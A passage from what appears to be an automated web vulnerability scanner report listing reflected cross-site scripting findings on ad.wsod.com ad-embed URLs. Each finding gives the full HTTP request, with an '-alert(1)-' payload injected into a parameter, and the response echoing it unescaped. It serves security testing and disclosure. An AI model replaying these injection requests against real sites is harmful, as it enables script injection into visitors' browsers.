5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2e9f'-alert(1)-'f8feea60c6c was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:10 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843030:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:10 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Ga2e9f'-alert(1)-'f8feea60c6c&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       fun
...[SNIP]...

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baa4c'-alert(1)-'46b9da792e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:38 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:40771:1303843058:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:38 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 920

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&baa4c'-alert(1)-'46b9da792e5=1';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b1
...[SNIP]...

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b088d'-alert(1)-'3a36277583e was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:29 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843289:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:29 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898b088d'-alert(1)-'3a36277583e&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
...[SNIP]...

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5eff5'-alert(1)-'4670c7c8014 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:17 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843277:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!5eff5'-alert(1)-'4670c7c8014&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               re
...[SNIP]...

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52705'-alert(1)-'5838e5807a8 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:45 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843305:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015252705'-alert(1)-'5838e5807a8&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       docume
...[SNIP]...

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d0a2'-alert(1)-'eddc83441b0 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:59 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843319:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad9d0a2'-alert(1)-'eddc83441b0';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b108
...[SNIP]...

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3646'-alert(1)-'9d3890ffc58 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:55 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843315:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:55 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQc3646'-alert(1)-'9d3890ffc58&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('
...[SNIP]...

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d724'-alert(1)-'aba732753ad was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:41 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843301:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=282534887d724'-alert(1)-'aba732753ad&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image35
...[SNIP]...

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2488'-alert(1)-'0a19383e732 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:41:34 GMT; path=/
Set-Cookie: i_1=33:353:198:141:0:45001:1303843294:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:41:34 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 858

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=Gc2488'-alert(1)-'0a19383e732&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       fun
...[SNIP]...

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bdf'-alert(1)-'051170363a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843218**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@2F?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:42:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:42:04 GMT; path=/
Set-Cookie: i_1=33:353:516:141:0:45001:1303843324:L|33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2; expires=Thu, 26-May-2011 18:42:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 855

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad&b2bdf'-alert(1)-'051170363a0=1';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image353() {
       document.write('<a href="//ad.wsod.com/click/8bec9b1
...[SNIP]...

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8654"-alert(1)-"c50bffdece4 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843017**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898d8654"-alert(1)-"c50bffdece4&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

